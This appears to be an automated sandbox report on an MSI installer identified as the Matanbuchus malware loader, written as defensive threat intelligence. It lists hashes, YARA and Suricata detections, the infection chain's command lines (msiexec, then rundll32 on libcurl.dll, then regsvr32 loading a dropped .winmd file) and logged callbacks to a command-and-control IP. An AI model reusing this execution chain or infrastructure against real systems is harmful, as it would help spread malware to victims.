Edit tour

Windows Analysis Report
klog.php.msi

Overview

General Information

Sample name:	klog.php.msi
Analysis ID:	1570375
MD5:	18d5f1a9bfb3e34ff25bbda3f05d386f
SHA1:	4b4394e1c8d91b4d7d1bec0c4a443fa08243994f
SHA256:	55a33165fba0f7134e4ca482e0951c143b04e6a0e78fdc5f702e74e08bfd9249
Tags:	BruteRatelC4Latrodectusmsiuser-k3dg3___
Infos:

Detection

Matanbuchus

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Matanbuchus

AI detected suspicious sample

Found evasive API chain (may stop execution after checking mutex)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Sigma detected: Potentially Suspicious Malware Callback Communication

Uses known network protocols on non-standard ports

Checks for available system drives (often done to infect USB drives)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 6708 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\klog.php.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 6812 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 6980 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 7D4FE581FB47C85FAEE5D96881C26D11 MD5: 9D09DC1EDA745A5F87553048E57620CF)

rundll32.exe (PID: 7152 cmdline: C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 2412 cmdline: C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init MD5: 889B99C52A60DD49227C5E485A016679)

regsvr32.exe (PID: 5324 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

regsvr32.exe (PID: 3332 cmdline: -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

regsvr32.exe (PID: 7148 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

regsvr32.exe (PID: 1272 cmdline: -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

regsvr32.exe (PID: 6636 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

regsvr32.exe (PID: 6748 cmdline: -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

regsvr32.exe (PID: 5928 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

regsvr32.exe (PID: 984 cmdline: -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

regsvr32.exe (PID: 4928 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

regsvr32.exe (PID: 1732 cmdline: -e -n -i:"C:\Users\user\8f08\701188\701188.winmd" "C:\Users\user\8f08\701188\701188.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Matanbuchus	According to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections.Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.	No Attribution	https://blog.cyber5w.com/matanbuchus-loader-analysis https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/ https://isc.sans.edu/diary/rss/28752 https://medium.com/@DCSO_CyTec/a-deal-with-the-devil-analysis-of-a-recent-matanbuchus-sample-3ce991951d6a https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/	https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\silver\libcurl.dll	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
C:\Users\user\8f08\701188\701188.winmd	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.3747374058.0000000004D91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1d895:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x1f125:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
00000010.00000002.3747374058.0000000004D91000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x33350:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
00000010.00000002.3747924404.000000007F3B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
00000010.00000002.3747924404.000000007F3B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1f275:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x20b05:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
00000010.00000002.3747924404.000000007F3B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x34d30:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
00000004.00000002.4167564945.0000000005395000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1d895:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x1f125:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
00000004.00000002.4167564945.0000000005395000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x33350:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1f275:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x20b05:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x34d30:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
0000000E.00000002.3141366328.000000007F150000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
0000000E.00000002.3141366328.000000007F150000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1f275:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x20b05:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
0000000E.00000002.3141366328.000000007F150000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x34d30:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
0000000B.00000002.2555091731.0000000004A29000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1d895:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x1f125:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
0000000B.00000002.2555091731.0000000004A29000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x33350:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
00000006.00000002.2050235093.0000000004D82000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1d895:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x1f125:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
00000006.00000002.2050235093.0000000004D82000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x33350:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
0000000E.00000002.3140990675.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1d895:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x1f125:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
0000000E.00000002.3140990675.0000000004C2F000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x33350:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1f275:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x20b05:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
0000000B.00000002.2555445907.000000007F4B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x34d30:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
00000004.00000002.4167344781.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1f275:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x20b05:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x34d30:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.regsvr32.exe.6beb0000.0.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
4.2.rundll32.exe.4eb0000.0.raw.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
4.2.rundll32.exe.4eb0000.0.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
18.2.regsvr32.exe.6beb0000.0.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
6.2.regsvr32.exe.6beb0000.0.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
4.2.rundll32.exe.6c530000.1.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
11.2.regsvr32.exe.6beb0000.0.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
14.2.regsvr32.exe.6beb0000.0.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
14.2.regsvr32.exe.7f150000.1.raw.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
14.2.regsvr32.exe.7f150000.1.raw.unpack	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1f275:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x20b05:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
14.2.regsvr32.exe.7f150000.1.raw.unpack	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x34d30:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
16.2.regsvr32.exe.7f3b0000.1.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
16.2.regsvr32.exe.7f3b0000.1.unpack	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1d875:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x1f105:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
16.2.regsvr32.exe.7f3b0000.1.unpack	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x33330:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
11.2.regsvr32.exe.7f4b0000.1.raw.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
11.2.regsvr32.exe.7f4b0000.1.raw.unpack	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1f275:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x20b05:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
11.2.regsvr32.exe.7f4b0000.1.raw.unpack	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x34d30:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
11.2.regsvr32.exe.7f4b0000.1.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
11.2.regsvr32.exe.7f4b0000.1.unpack	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1d875:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x1f105:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
11.2.regsvr32.exe.7f4b0000.1.unpack	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x33330:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
6.2.regsvr32.exe.7eed0000.1.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
6.2.regsvr32.exe.7eed0000.1.unpack	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1d875:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x1f105:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
6.2.regsvr32.exe.7eed0000.1.unpack	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x33330:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
4.2.rundll32.exe.7ee00000.2.raw.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
4.2.rundll32.exe.7ee00000.2.raw.unpack	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1f275:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x20b05:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
4.2.rundll32.exe.7ee00000.2.raw.unpack	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x34d30:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
14.2.regsvr32.exe.7f150000.1.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
14.2.regsvr32.exe.7f150000.1.unpack	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1d875:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x1f105:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
14.2.regsvr32.exe.7f150000.1.unpack	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x33330:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
6.2.regsvr32.exe.7eed0000.1.raw.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
6.2.regsvr32.exe.7eed0000.1.raw.unpack	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1f275:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x20b05:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
6.2.regsvr32.exe.7eed0000.1.raw.unpack	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x34d30:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
16.2.regsvr32.exe.7f3b0000.1.raw.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
16.2.regsvr32.exe.7f3b0000.1.raw.unpack	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1f275:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x20b05:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
16.2.regsvr32.exe.7f3b0000.1.raw.unpack	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x34d30:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
4.2.rundll32.exe.7ee00000.2.unpack	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
4.2.rundll32.exe.7ee00000.2.unpack	Windows_Trojan_Matanbuchus_4ce9affb	unknown	unknown	0x1d875:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B 0x1f105:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
4.2.rundll32.exe.7ee00000.2.unpack	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x33330:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
Click to see the 33 entries

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Malware Callback Communication

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 185.234.216.175, DestinationIsIpv6: false, DestinationPort: 4443, EventID: 3, Image: C:\Windows\SysWOW64\rundll32.exe, Initiated: true, ProcessId: 2412, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 185.234.216.175, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 3332, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732

Suricata Signatures

ET MALWARE Matanbuchus Loader CnC M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T22:11:54.422793+0100	2034468	1	Malware Command and Control Activity Detected	192.168.2.4	49752	185.234.216.175	4443	TCP
2024-12-06T22:13:55.569892+0100	2034468	1	Malware Command and Control Activity Detected	192.168.2.4	50070	185.234.216.175	4443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.9% probability

Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.234.216.175:443 -> 192.168.2.4:50133 version: TLS 1.2

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.4:49752 -> 185.234.216.175:4443
Source: Network traffic	Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.4:50070 -> 185.234.216.175:4443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 185.234.216.175 443

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 4443
Source: unknown	Network traffic detected: HTTP traffic on port 4443 -> 49752
